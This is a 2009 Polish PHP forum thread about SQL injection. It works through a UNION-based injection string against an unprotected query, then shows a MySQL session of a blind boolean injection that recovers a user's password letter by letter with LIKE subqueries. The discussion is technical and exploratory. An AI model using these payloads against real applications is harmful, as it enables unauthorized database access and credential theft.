sqlinjection z union - Forum PHP.pl

sqlinjection z union

nospor Zobacz profil	16.02.2009, 17:24:23 Post #1
Grupa: Moderatorzy Postów: 36 557 Pomógł: 6315 Dołączył: 27.12.2004	Pytanie teoretyczne: czy jest możliwość wstawienia zapytania z union, do następującej teoretycznej sytuacji: skrypt niezabezpieczony w zaden sposob przed sqlinjection, mozna wkladac co nam się chce. wykonywane zapytanie: [SQL] pobierz, plaintext SELECT cos, cos2, cos3 FROM tabela WHERE pole = 'cosZforma'; [SQL] pobierz, plaintext gdzie cosZforma to dana, która moze w formularzu dowolnie modyfikowac. Chcac wstawic uniona, wystarczy wiec za cosZforma wstawic: ' union select c1,c2,c3 from innatabela where '1=1 w rezulatacie otrzymamy poprawne zapytanie z union [SQL] pobierz, plaintext SELECT cos, cos2, cos3 FROM tabela WHERE pole = '' UNION SELECT c1,c2,c3 FROM innatabela WHERE '1=1'; [SQL] pobierz, plaintext pojawia sie jednak problem, gdyz nasze glowne zapytanie poprzedzane jest zapytaniem zliczającym, czyli [SQL] pobierz, plaintext SELECT count() FROM tabela WHERE pole = 'cosZforma'; [SQL] pobierz, plaintext w rezulatacie po wstawieniu naszej zmiennej otrzymamy [SQL] pobierz, plaintext SELECT count() FROM tabela WHERE pole = '' UNION SELECT c1,c2,c3 FROM innatabela WHERE '1=1'; [SQL] pobierz, plaintext Co wywali nam zapytanie, gdyz union dostarczy nam inną liczbę kolumn. Skrypt dalej sie nie wykona, bo zapytanie z count() zwraca nam false i nie jedziemy dalej. Czy istnieje jakies ominiecie tego? By w jednym ciągu zawrzec zarówna jedną kolumne i kilka kolumn? Tak by przeszlo zarowno przez zapytanie z count() jak i drugie pobierające dane? ps: nie chce nikogo hackowac. Interesuje mnie, czy jest to możliwe. -------------------- "Myśl, myśl, myśl..."* - Kubuś Puchatek \|\| *"Manual, manual, manual..."* - Kubuś Programista *"Szukaj, szukaj, szukaj..."* - Kubuś Odkrywca \|\| *"Debuguj, debuguj, debuguj..."* - Kubuś Developer

Odpowiedzi

pyro Zobacz profil	16.02.2009, 18:16:14 Post #2
Grupa: Zarejestrowani Postów: 2 148 Pomógł: 230 Dołączył: 26.03.2008 Ostrzeżenie: (0%)	Hmmm... nie wiem jak z UNION'em ale wydaje mi się ze w ten sposob się nie da... za to można zrobić inne ciekawe sztuczki w ten sposób... pozwól że za chwilę zupdatuje posta z małym przykładem. // EDIT [SQL] pobierz, plaintext mysql> CREATE TABLE users(id int NOT NULL AUTO_INCREMENT PRIMARY KEY, login char (10), pass char(10)); Query OK, 0 rows affected (0.09 sec) mysql> INSERT INTO users VALUES(NULL, 'wujek', 'crimson'); Query OK, 1 row affected (0.05 sec) mysql> INSERT INTO users VALUES(NULL, 'ciocia', 'pirate'); Query OK, 1 row affected (0.00 sec) mysql> INSERT INTO users VALUES(NULL, 'synek', 'passik'); Query OK, 1 row affected (0.01 sec) mysql> CREATE TABLE articles(article_id int NOT NULL AUTO_INCREMENT PRIMARY KEY, article_body longtext); Query OK, 0 rows affected (0.02 sec) mysql> INSERT INTO articles SET article_id=NULL, article_body='To jest przyklado wy artykul'; Query OK, 1 row affected (0.08 sec) mysql> SELECT * FROM articles; +------------+-----------------------------+ \| article_id \| article_body \| +------------+-----------------------------+ \| 1 \| TO jest przykladowy artykul \| +------------+-----------------------------+ 1 row IN SET (0.00 sec) mysql> SELECT count() FROM articles WHERE article_id = '' OR (SELECT login FROM users WHERE login = 'wujek' AND pass LIKE 'c%') = 'wujek'; +----------+ \| count() \| +----------+ \| 1 \| +----------+ 1 row IN SET (0.00 sec) mysql> SELECT count() FROM articles WHERE article_id = '' OR (SELECT login FROM users WHERE login = 'wujek' AND pass LIKE 'ca%') = 'wujek'; +----------+ \| count() \| +----------+ \| 0 \| +----------+ 1 row IN SET (0.00 sec) mysql> SELECT count() FROM articles WHERE article_id = '' OR (SELECT login FROM users WHERE login = 'wujek' AND pass LIKE 'cw%') = 'wujek'; +----------+ \| count() \| +----------+ \| 0 \| +----------+ 1 row IN SET (0.00 sec) mysql> SELECT count() FROM articles WHERE article_id = '' OR (SELECT login FROM users WHERE login = 'wujek' AND pass LIKE 'cr%') = 'wujek'; +----------+ \| count() \| +----------+ \| 1 \| +----------+ 1 row IN SET (0.00 sec) mysql> # I tak dalej mozna odgadnac haslo konkretnego/niekonkretnego usera z zupelnie innej tabeli :) mysql> [SQL] pobierz, plaintext Ten post edytował pyro 16.02.2009, 18:30:10 -------------------- ET LINGUA EIUS LOQUETUR IUDICIUM

Posty w temacie

nospor sqlinjection z union 16.02.2009, 17:24:23

pyro Hmmm... nie wiem jak z UNION'em ale wydaje mi ... 16.02.2009, 18:16:14

nospor ok Chodzi mi głównie, czy moge w ten sposob pobra... 16.02.2009, 18:17:46

BaN Można spróbować zastosować jakąś funkcję np. CONCA... 16.02.2009, 18:22:52

nospor @BaN tak, ale wowczas zapytanie wylozy sie na drug... 16.02.2009, 18:25:39

pyro Cytat(nospor @ 16.02.2009, 18:25:39 )... 16.02.2009, 18:32:41

nospor @pyro o tym, ze w ten sposob mozna pobrac to wiem ... 16.02.2009, 18:35:25

pyro Cytat(nospor @ 16.02.2009, 18:35:25 )... 16.02.2009, 18:37:10

BaN Raczej się nie wyłoży, chyba, że czegoś nie rozumi... 16.02.2009, 18:41:55

nospor Cytatno raczej by się to sprowadzało do tego sameg... 16.02.2009, 18:43:11

BaN Cytat(nospor @ 16.02.2009, 18:43:11 )... 16.02.2009, 18:54:19

pyro Jeżeli w kodzie PHP jest to interpretowane w... 16.02.2009, 18:49:49

nospor nie, jest tak jak pisalem: najpierw w php jest zap... 16.02.2009, 18:52:12

pyro [SQL] pobierz, plaintext mysql> SELECT count... 16.02.2009, 18:55:36

nospor CytatChyba że ten ostatni post nie do mnieNo chyba... 17.02.2009, 09:36:24

pyro Cytat(nospor @ 17.02.2009, 09:36:24 )... 17.02.2009, 13:12:04

nospor CytatLub dodać najzwyklejsze union jesli zapytanie... 17.02.2009, 13:15:57

« Następny starszy · MySQL · Następny nowszy »

1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych: